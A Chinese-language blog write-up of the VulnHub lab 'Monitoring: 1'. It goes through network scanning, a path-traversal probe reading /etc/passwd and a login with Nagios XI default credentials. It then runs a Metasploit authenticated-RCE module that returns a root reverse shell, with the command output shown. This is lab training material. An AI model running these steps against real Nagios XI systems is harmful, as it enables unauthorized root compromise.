wait's〔三生石畔〕 善良人在追求中纵然迷惘,却终将意识到有一条正途。—— 歌德
【渗透测试-靶场】No.20:Monitoring: 1(vulnhub)渗透测试
发表于: | 分类: 安全测试,资格认证 | 评论:0 | 阅读: 1400

一、前言

主要利用方式:nagios xi 系统默认用户+弱口令 +RCE直接提权root权限(使用metasploit)

二、靶机信息

靶场: vulnhub.com
靶机名称: MONITORING: 1
难度: 简单
发布时间: 2020 年 9月 14日
下载地址:https://www.vulnhub.com/entry/monitoring-1,555/
备注:在RCE的时候,通过手工也能利用,但kali存在一些配置要进行改动,浪费了不少时间,索性复习一下metasploit方法

三、虚拟机配置
Vmware、网络连接模式:NAT模式、DHCP服务:启用、IP地址:自动分配

四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l

2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 192.168.169.169

└─$ sudo nmap -p22,25,80,389,443,5667 -sV -A 192.168.169.169

3、常规访问80端口web服务及扫描web路径
http://192.168.169.169/

└─$ dirsearch -u 192.168.169.169

存在cgi-bin目录,但再次扫描目录后未发现有更多的目录特征

4、点击 access nagios xi 按钮,跳转到登录界面
http://192.168.169.169/nagiosxi/login.php?redirect=/nagiosxi/index.php%3f&noauth=1

5、redirect接口感觉存在本地文件包含,尝试,无果
http://192.168.169.169/nagiosxi/login.php?redirect=/../../../../../../../etc/passwd

五、漏洞利用(突破边界)
6、有登录,尝试弱口令,通过百度,能查到默认的用户名,尝试爆破

使用账号密码:nagiosadmin/admin 进入后台,并发现nagios xi 版本为5.6.0

六、提权
7、本次使用msf进行提权
└─$ sudo msfconsole

8、查看nagios xi的可利用条件
msf6 > search nagios xi

9、经过多方尝试,使用第7个,可以正常提权
msf6 > use 7

10、查看必填项目,输入参入,执行RCE
show options (查看有哪些必填项 一般后面是yes的都是必填项)
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set rhosts 192.168.169.169(靶机IP)
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set lhost 192.168.169.129 (kali IP)
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > set password admin(登录的密码)
msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > run(就是getshell)

11、提升为交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"

12、获取靶机的id、ip及flag
meterpreter > shell
Process 58261 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c "import pty;pty.spawn('/bin/bash')"
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
inet6 ::1/128 scope host 
   valid_lft forever preferred_lft forever

2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000

link/ether 00:0c:29:6f:f9:10 brd ff:ff:ff:ff:ff:ff
inet 192.168.169.169/24 brd 192.168.169.255 scope global ens33
   valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe6f:f910/64 scope link 
   valid_lft forever preferred_lft forever

root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# cd /root/
cd /root/
root@ubuntu:~# ls
ls
proof.txt scripts
root@ubuntu:~# cat /root/proof.txt
cat /root/proof.txt
SunCSR.Team.3.af6d45da1f1181347b9e2139f23c6a5b
root@ubuntu:~#

标签: OSCP vulnhub

添加新评论

TOP